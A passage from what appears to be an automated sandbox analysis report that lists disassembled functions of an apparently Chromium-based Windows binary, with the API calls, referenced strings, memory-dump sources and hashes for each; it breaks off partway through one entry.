                                                  • Instruction Fuzzy Hash: F011C3759043859BC700EF64DC45AAFB7A8EFD9734F000B1DF59192291EBB4E2498BA3
                                                  Function 00D62225 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00D622A0,00D624A8), ref: 00D6223C
                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00D62252
                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00D62267
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                  • API String ID: 667068680-1718035505
                                                  • Opcode ID: 5b56dc5123c2689230a9e83b1cc815e0dddc344ff6ba1d62a20c2b5f3b49c7cb
                                                  • Instruction ID: 4c969a28c79e7b8cf906a2db91c14a8715f947d306bc13e9b435dbd222326c39
                                                  • Opcode Fuzzy Hash: 5b56dc5123c2689230a9e83b1cc815e0dddc344ff6ba1d62a20c2b5f3b49c7cb
                                                  • Instruction Fuzzy Hash: 84F0AF31B10B63DB0B219EA59CE99BA23E9AB1A7913198A3DE941D3250D770CC0447F5
                                                  Function 00D7224F Relevance: 9.3, APIs: 6, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba9d837733dde41dca1b8477924334eb8a6491dfaa049595ee101342a49d698c
                                                  • Instruction ID: cf49bc16a6770bef431f01a66821cfe618cf88f5f5d9df0f9cfe0a5cbb701d5c
                                                  • Opcode Fuzzy Hash: ba9d837733dde41dca1b8477924334eb8a6491dfaa049595ee101342a49d698c
                                                  • Instruction Fuzzy Hash: 02B1F170A04289AFDB21DFA8D891BBD7BB1EF45318F188148E84997392E770DD41CB74
                                                  Function 00D81BDC Relevance: 9.2, APIs: 6, Instructions: 248COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,00D81BC7,00000000,00000000,00000000,00000001,?,?,?,?,00000001,00000000), ref: 00D81C82
                                                  • __freea.LIBCMT ref: 00D81E17
                                                  • __freea.LIBCMT ref: 00D81E1D
                                                  • __freea.LIBCMT ref: 00D81E53
                                                  • __freea.LIBCMT ref: 00D81E59
                                                  • __freea.LIBCMT ref: 00D81E69
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: __freea$Info
                                                  • String ID:
                                                  • API String ID: 541289543-0
                                                  • Opcode ID: 282bca02524d8b20a5b76b2701905d53274fe7315ee2afb5864134ad8c935159
                                                  • Instruction ID: 0eb341bfca768095e835fbcaf55ddbcf8e22ad265c4e1c3e638e2a08e6645395
                                                  • Opcode Fuzzy Hash: 282bca02524d8b20a5b76b2701905d53274fe7315ee2afb5864134ad8c935159
                                                  • Instruction Fuzzy Hash: 6371D17A900205ABDF21AE548C41FAEB7BEEF89310F290519FD05A7281E775DC4A8770
                                                  Function 00D791E7 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,00000001,00D791DE,00D63804,00000011), ref: 00D791F5
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D79203
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D7921C
                                                  • SetLastError.KERNEL32(00000000), ref: 00D7926E
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: b816ccb63a6d11c222da775e02628c09694c7660635e633ce356c5848c4f78de
                                                  • Instruction ID: b9ec7f130777264416a9b412554de5e9a047965cea48e3d9b04ccedab5d91565
                                                  • Opcode Fuzzy Hash: b816ccb63a6d11c222da775e02628c09694c7660635e633ce356c5848c4f78de
                                                  • Instruction Fuzzy Hash: 3B01B53310D313AED6153678FC959577A48EB11B7DB64422AF118905E2FF514C02A278
                                                  Function 00D29A80 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 273COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • __location != nullptr, xrefs: 00D29DD6
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h, xrefs: 00D29DDD
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D29DE2
                                                  • null pointer given to construct_at, xrefs: 00D29DD1
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: AdminUser
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h$__location != nullptr$null pointer given to construct_at
                                                  • API String ID: 2487005531-3901857445
                                                  • Opcode ID: 14ae394bd76c8fe647e178621e2e49b784911bf055f25555119d6bbeb52a64f0
                                                  • Instruction ID: f82b9a3e363d0213efead053f51cd41c416e09629100c249d04e6673aaaf5a97
                                                  • Opcode Fuzzy Hash: 14ae394bd76c8fe647e178621e2e49b784911bf055f25555119d6bbeb52a64f0
                                                  • Instruction Fuzzy Hash: 23A184B1E002259BCF20EFA4E895AEEF771EF55324F184228E9253B2C1DB315945DBB1
                                                  Function 00D32050 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • vector[] index out of bounds, xrefs: 00D32145
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\vector, xrefs: 00D32154
                                                  • __n < size(), xrefs: 00D3214A
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D32159
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\vector$__n < size()$vector[] index out of bounds
                                                  • API String ID: 4218353326-797005249
                                                  • Opcode ID: 9f644da350a0e76fc92b223192c7726bb9188488eca1e692050e99ed9e7c02ff
                                                  • Instruction ID: 0f1b2cf41e9f109b453af9216506fa968b660218ee0ffbc09eb1de61c40bb2f3
                                                  • Opcode Fuzzy Hash: 9f644da350a0e76fc92b223192c7726bb9188488eca1e692050e99ed9e7c02ff
                                                  • Instruction Fuzzy Hash: BA316274B002055F8B14DF68C8D6C7FBBB1EF49760B144169E91A9B392DB31A805CBB1
                                                  Function 00D43EE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 89libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,?,?,?,00000000), ref: 00D43F5C
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,00000000), ref: 00D43F76
                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00D43F87
                                                  Strings
                                                  • LoadSystemLibraryHelper, xrefs: 00D43F2D
                                                  • ..\..\base\native_library_win.cc, xrefs: 00D43F28
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorHandleLastLibraryLoadModule
                                                  • String ID: ..\..\base\native_library_win.cc$LoadSystemLibraryHelper
                                                  • API String ID: 2073469066-114162673
                                                  • Opcode ID: e21b6832465c4c7068be18004a94fc9ed16ba3d9122f327ecdbc9ed07bc3cfa2
                                                  • Instruction ID: 1e5846b01d721ffa68a1fcd634e8852b52854110a7fbf0bc33c9f29c93afe7e2
                                                  • Opcode Fuzzy Hash: e21b6832465c4c7068be18004a94fc9ed16ba3d9122f327ecdbc9ed07bc3cfa2
                                                  • Instruction Fuzzy Hash: 1331A171A043419FD310AF289C85A2ABBA8FF89720F15071DF9D597281EB709944CBA2
                                                  Function 00D25D90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetComputerNameExW.KERNEL32(00000003,00000000,00000100), ref: 00D25E2A
                                                  • __Init_thread_header.LIBCMT ref: 00D25EA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ComputerInit_thread_headerName
                                                  • String ID: ..\..\base\win\win_util.cc$.corp.microsoft.com$Checking if internal user
                                                  • API String ID: 1167110251-4028950682
                                                  • Opcode ID: aeeb1b0089db2e4b843da434be5df5afb4c75b90b215e249df4a475848f884f6
                                                  • Instruction ID: b912f2f51ae7034e57101732ca93bc17a761cce0bca9b48411a777f5dd6eb91b
                                                  • Opcode Fuzzy Hash: aeeb1b0089db2e4b843da434be5df5afb4c75b90b215e249df4a475848f884f6
                                                  • Instruction Fuzzy Hash: 10313B71A8471A6BDB20AB10BC07FEA7769EF11714F0401A9F915973C3DBB46E888771
                                                  Function 00D28A50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadFile.KERNEL32(?,?,?,FFFFFFFF,00000000), ref: 00D28AFC
                                                  • GetLastError.KERNEL32(?,?,?,FFFFFFFF,00000000), ref: 00D28B1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastRead
                                                  • String ID: ..\..\base\files\file_win.cc$File::ReadAtCurrentPos$ReadAtCurrentPos
                                                  • API String ID: 1948546556-1927398383
                                                  • Opcode ID: 9fe3ccd54688607146f7d9b249f91306f461743cb69ba98b54f9aeb2419330a8
                                                  • Instruction ID: 63f5203171545edc3146f434c4df2743aaa2debf9764e973f588327b22ed53a8
                                                  • Opcode Fuzzy Hash: 9fe3ccd54688607146f7d9b249f91306f461743cb69ba98b54f9aeb2419330a8
                                                  • Instruction Fuzzy Hash: 4721BD71604385ABD310DF64DC81A6BB7A8FFD9774F100B1DB6E1461C1EBB0D9088A72
                                                  Function 00D212B0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _strlen.LIBCMT ref: 00D21322
                                                    • Part of subcall function 00D1CE68: _strlen.LIBCMT ref: 00D1CE73
                                                  Strings
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\string, xrefs: 00D212D3
                                                  • __s != nullptr, xrefs: 00D212C9
                                                  • string::assign received nullptr, xrefs: 00D212C4
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D212D8
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\string$__s != nullptr$string::assign received nullptr
                                                  • API String ID: 4218353326-1155457705
                                                  • Opcode ID: 861d3e95ab6d602842b7225a940b2888c63b717841e44429a51df20d20408c19
                                                  • Instruction ID: 50a124b1e7370b569c8c5eea4c2e2d661116bedfb8b483e993f0266bfed8e56e
                                                  • Opcode Fuzzy Hash: 861d3e95ab6d602842b7225a940b2888c63b717841e44429a51df20d20408c19
                                                  • Instruction Fuzzy Hash: 8901B97A340335ABD6109695FC4195AB39E9B79B58B0DC072F90497A41E671EC50C6F0
                                                  Function 00D37FA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _strlen.LIBCMT ref: 00D37FBE
                                                  • __Init_thread_header.LIBCMT ref: 00D38061
                                                    • Part of subcall function 00D61817: EnterCriticalSection.KERNEL32(00DC3F80,?,?,?,00D45339,00DD0648,00000000,?,?,?,?,00D450B7,00000000,00000000), ref: 00D61822
                                                    • Part of subcall function 00D61817: LeaveCriticalSection.KERNEL32(00DC3F80,?,?,?,00D45339,00DD0648,00000000,?,?,?,?,00D450B7,00000000,00000000), ref: 00D6185F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterInit_thread_headerLeave_strlen
                                                  • String ID: ..\..\base\feature_list.cc$Fail$FeatureList-feature-accessed-too-early
                                                  • API String ID: 3908761850-1983271533
                                                  • Opcode ID: 15e010eed42cf10c8bed12f6e472d51981c48797774c2247b33bf76828af18ca
                                                  • Instruction ID: 1520928cdec4f9d0cf1421b27f614c14dc5475f1ed001a6c919542926f0a9857
                                                  • Opcode Fuzzy Hash: 15e010eed42cf10c8bed12f6e472d51981c48797774c2247b33bf76828af18ca
                                                  • Instruction Fuzzy Hash: 0921F2B1904B03ABC210EF24FC06D5AB7A0FF85725F44072DF85647281EB31A94986B3
                                                  Function 00D46C90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _strlen.LIBCMT ref: 00D46CE0
                                                  • __Init_thread_header.LIBCMT ref: 00D46D04
                                                  • __Init_thread_header.LIBCMT ref: 00D46D33
                                                    • Part of subcall function 00D61817: EnterCriticalSection.KERNEL32(00DC3F80,?,?,?,00D45339,00DD0648,00000000,?,?,?,?,00D450B7,00000000,00000000), ref: 00D61822
                                                    • Part of subcall function 00D61817: LeaveCriticalSection.KERNEL32(00DC3F80,?,?,?,00D45339,00DD0648,00000000,?,?,?,?,00D450B7,00000000,00000000), ref: 00D6185F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CriticalInit_thread_headerSection$EnterLeave_strlen
                                                  • String ID: GetFileAttributesExFromAppW$windows.storage.onecore.dll
                                                  • API String ID: 4136119699-496592073
                                                  • Opcode ID: 407147005adb1d51cbbe22126ce7b688632dbed9c74d26c71292765f053222db
                                                  • Instruction ID: 08ffc89c4b5fe32891ec1fd1f61f79c7b1b7f42830acb5270dd6c590d09c357c
                                                  • Opcode Fuzzy Hash: 407147005adb1d51cbbe22126ce7b688632dbed9c74d26c71292765f053222db
                                                  • Instruction Fuzzy Hash: 7A11D675A41200ABD2209B28FD82B653F60E7D6724F19423BE846833C1D731DC259973
                                                  Function 00D1D384 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\string, xrefs: 00D1D3B9
